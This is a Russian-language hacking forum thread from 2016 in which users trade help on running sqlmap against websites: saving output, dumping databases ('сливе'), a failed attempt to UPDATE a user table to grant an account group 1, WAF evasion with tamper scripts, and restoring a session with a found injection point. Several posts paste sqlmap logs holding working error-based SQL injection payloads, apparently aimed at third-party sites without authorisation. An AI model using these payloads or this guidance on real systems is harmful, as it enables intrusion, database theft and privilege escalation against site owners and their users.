27.04.2016, 16:52
|
|
Новичок
Регистрация: 31.01.2010
Сообщений: 18
С нами:
8566628
Репутация:
0
|
|
Народ как sqlmapy указать куда сохранять логи сайтов? а то он всё сюда складирует C:\Documents and Settings\User\.sqlmap\output\ раньше было где стоял туда и сохранял
|
|
|
27.04.2016, 17:09
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами:
8334326
Репутация:
0
|
|
Сообщение от 3acuson
↑
Народ как sqlmapy указать куда сохранять логи сайтов? а то он всё сюда складирует C:\Documents and Settings\User\.sqlmap\output\ раньше было где стоял туда и сохранял
--output-dir=OUT.
|
|
|
|
02.05.2016, 00:30
|
|
Новичок
Регистрация: 30.04.2016
Сообщений: 6
С нами:
5282966
Репутация:
0
|
|
Sqlmapchik (andoid port) после слития примерно 1000 строк вылетает без ошибок не сохраняя ни единой строки. Вылетает из за полного заполнения озу.
Озу 768 Мб. Свап 512.
Что можно сделать?
|
|
|
|
03.05.2016, 19:48
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Как сделать sql запрос в sql-shell?
Делаю такой запрос: UPDATE `db_user` SET `user_group_id` = '1' WHERE `db_user`.`user_id` = 2;
В таблице db_user пользователю с user_id = 2 установить user_group_id = 1
В ответ получаю:
"[WARNING] execution of custom SQL queries is only available when stacked queries are supported"
Подскажите что не так?
|
|
|
|
03.05.2016, 20:35
|
|
Участник форума
Регистрация: 19.05.2015
Сообщений: 117
С нами:
5782646
Репутация:
22
|
|
Сообщение от kacergei
↑
Как сделать sql запрос в sql-shell?
Делаю такой запрос: UPDATE `db_user` SET `user_group_id` = '1' WHERE `db_user`.`user_id` = 2;
В таблице db_user пользователю с user_id = 2 установить user_group_id = 1
В ответ получаю:
"[WARNING] execution of custom SQL queries is only available when stacked queries are supported"
Подскажите что не так?
уязвимость не поддерживает вложенные запросы(stacked queries) а значит писать в базу не получится, только читать,через SELECT
|
|
|
|
13.08.2016, 20:31
|
|
Новичок
Регистрация: 29.07.2015
Сообщений: 25
С нами:
5680406
Репутация:
0
|
|
уважаемые, все хотел спросить, а можно разделитель сменить ну к примеру на : при сливе бд или что бы он был по дефолту
|
|
|
|
20.08.2016, 09:55
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами:
8334326
Репутация:
0
|
|
[09:53:38] [INFO] testing MySQL
[09:53:38] [INFO] confirming MySQL
[09:53:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2.2.24
back-end DBMS: MySQL >= 5.0.0
[09:53:38] [INFO] fetching database names
[09:54:08] [WARNING] turning off pre-connect mechanism because of connection tim
e out(s)
[09:54:08] [CRITICAL] connection timed out to the target URL. sqlmap is going to
retry the request(s)
[09:54:08] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[09:54:08] [CRITICAL] connection dropped or unknown HTTP status code received
и так раз 50,что можно сделать?
[11:35:19] [INFO] fetching database names
[11:35:19] [PAYLOAD] '||(sElECt/**/'nMok'/**/fRoM/**/duAl/**/WHeRE/**/6034=6034/
**/aNd/**/(sElECt/**/2*(If((sElECt/**/*/**/fRoM/**/(sElECt/**/CoNCaT(0x7178717a7
1,(sElECt/**/cOUNt(schema_name)/**/fRoM/**/INFORMATION_SCHEMA.SCHEMATA),0x717878
7671,0x78))s),/**/8446744073709551610,/**/8446744073709551610))))||'
[11:35:49] [WARNING] turning off pre-connect mechanism because of connection tim
e out(s)
[11:35:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to
retry the request(s)
[11:35:49] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[11:35:49] [DEBUG] connection dropped or unknown HTTP status code received. sqlm
ap is going to retry the request
[11:35:49] [DEBUG] connection dropped or unknown HTTP status code received. sqlm
ap is going to retry the request
[11:35:49] [CRITICAL] connection dropped or unknown HTTP status code received
[11:35:49] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[11:35:49] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
kind of protection is involved (e.g. WAF)
|
|
|
|
20.08.2016, 20:30
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами:
8334326
Репутация:
0
|
|
-v 3 --dbs --random-agent --safe-url=2 --safe-freq=3 --skip-urlencode --tamper="informationschemacomment.py" --hex
[20:30:02] [INFO] retrieved:
[20:30:02] [DEBUG] performed 5 queries in 11.82 seconds
[20:30:02] [ERROR] unable to retrieve the number of databases
[20:30:02] [INFO] falling back to current database
[20:30:02] [INFO] fetching current database
[20:30:02] [PAYLOAD] ' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786b78
71,(MID((HEX(IFNULL(CAST(DATABASE() AS CHAR),0x20))),1,451)),0x716b6b7671,0x78))
s), 8446744073709551610, 8446744073709551610))) AND 'xzbL' LIKE 'xzbL
[20:30:04] [DEBUG] performed 1 queries in 1.23 seconds
[20:30:04] [CRITICAL] unable to retrieve the database names
Помогите плз
|
|
|
|
23.08.2016, 07:34
|
|
Новичок
Регистрация: 18.08.2016
Сообщений: 14
С нами:
5124566
Репутация:
0
|
|
добрый день всем, случилось так что похерил сессию скульмапа в которой нашел точки входа данных, сессию не могу восстановить, как указать данные из предыдущей сессии ?
сами данные:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lang (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lang=rus WHERE 1413=1413 AND (SELECT 4533 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT (ELT(4533=4533,1))),0x71716b7171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- LOyR
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
|
|
|
|
23.08.2016, 14:26
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от bustudo
↑
добрый день всем, случилось так что похерил сессию скульмапа в которой нашел точки входа данных, сессию не могу восстановить, как указать данные из предыдущей сессии ?
сами данные:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lang (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lang=rus WHERE 1413=1413 AND (SELECT 4533 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT (ELT(4533=4533,1))),0x71716b7171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- LOyR
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
они физичиски хранятся, если вы сменили ОС, пк, или была удалена та самая папка, то востановление, или никак.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
